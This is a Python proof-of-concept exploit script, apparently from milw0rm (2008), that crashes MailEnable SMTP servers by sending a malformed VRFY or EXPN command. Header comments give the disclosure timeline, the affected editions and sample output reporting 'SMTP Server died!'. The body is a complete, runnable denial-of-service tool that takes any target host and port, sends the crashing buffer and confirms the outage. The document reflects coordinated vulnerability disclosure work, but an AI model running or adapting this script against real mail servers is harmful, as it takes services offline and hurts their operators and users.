93 lines
No EOL
3.2 KiB
Python
Executable file
93 lines
No EOL
3.2 KiB
Python
Executable file
#!/usr/bin/python
|
|
##########################################################################
|
|
#
|
|
# MailEnable SMTP Service VRFY/EXPN Command Buffer Overflow ( DoS )
|
|
# Bug discovered by Matteo Memelli aka ryujin
|
|
# http://www.gray-world.net http://www.be4mind.com
|
|
#
|
|
# Affected Versions : Standard Edition all versions
|
|
# Professional Edition all versions
|
|
# Enterprise Edition all versions
|
|
# Tested on OS : Windows 2000 SP4 English
|
|
# Windows 2003 Standard Edition Italian
|
|
# Windows XP SP2 English
|
|
# Discovery Date : 02/24/2008
|
|
# Initial vendor notification : 03/06/2008
|
|
# Coordinated public disclosure: 03/11/2008
|
|
#
|
|
# CONGRATS TO THE MAILENABLE TEAM: VERY FAST IN PATCHING AND ANSWERING!!
|
|
#
|
|
#-------------------------------------------------------------------------
|
|
#
|
|
# THX TO muts at offensive-security.com :
|
|
# I'll promise you: next time i'll find an easier one and get my shell :P
|
|
#
|
|
#-------------------------------------------------------------------------
|
|
##########################################################################
|
|
#
|
|
# matte@badrobot:~$ ./mailenable_smtp.py -H 192.168.1.245 -P 25 -c VRFY
|
|
# [+] Connecting to 192.168.1.245 on port 25
|
|
# 220 test.local ESMTP MailEnable Service, Version: 0-3.13- ready at \
|
|
# 03/06/08 13:20:49
|
|
#
|
|
# [+] Sending evilbuffer...
|
|
# [+] Waiting 10 secs before reconnecting...
|
|
# [+] Reconnecting...
|
|
# [+] SMTP Server died!
|
|
# [+] Connection refused
|
|
#
|
|
##########################################################################
|
|
|
|
from socket import *
|
|
from optparse import OptionParser
|
|
import sys, time
|
|
|
|
usage = "%prog -H TARGET_HOST -P TARGET_PORT [-c COMMAND]"
|
|
parser = OptionParser(usage=usage)
|
|
parser.add_option("-H", "--target_host", type="string",
|
|
action="store", dest="HOST",
|
|
help="Target Host")
|
|
parser.add_option("-P", "--target_port", type="int",
|
|
action="store", dest="PORT",
|
|
help="Target Port")
|
|
parser.add_option("-c", "--command", type="string",
|
|
action="store", dest="COMMAND",
|
|
help="Command: VRFY or EXPN ; defualt VRFY")
|
|
(options, args) = parser.parse_args()
|
|
HOST = options.HOST
|
|
PORT = options.PORT
|
|
COMMAND = options.COMMAND
|
|
if not (HOST and PORT):
|
|
parser.print_help()
|
|
sys.exit()
|
|
if not COMMAND:
|
|
COMMAND = 'VRFY'
|
|
print "[+] Using default command VRFY"
|
|
else:
|
|
COMMAND = COMMAND.upper().strip()
|
|
if COMMAND != 'VRFY' and COMMAND != 'EXPN':
|
|
print 'Invalid command "%s" Choose between VRFY or EXPN!' % COMMAND
|
|
sys.exit()
|
|
evilbuf = '%s \nSMTPISGONNADIE\r\n' % COMMAND
|
|
s = socket(AF_INET, SOCK_STREAM)
|
|
s.connect((HOST, PORT))
|
|
print "[+] Connecting to %s on port %d" % (HOST, PORT)
|
|
print s.recv(1024)
|
|
print "[+] Sending evilbuffer..."
|
|
s.send(evilbuf)
|
|
s.close()
|
|
print "[+] Waiting 10 secs before reconnecting..."
|
|
time.sleep(10)
|
|
try:
|
|
s = socket(AF_INET, SOCK_STREAM)
|
|
print "[+] Reconnecting..."
|
|
s.connect((HOST, PORT))
|
|
except error, e:
|
|
print "[+] SMTP Server died!"
|
|
print "[+] %s" % e[1]
|
|
else:
|
|
print "[-] SMTP Server is still up"
|
|
print "[-] This probably means that is not vulnerable"
|
|
s.close()
|
|
|
|
# milw0rm.com [2008-03-11] |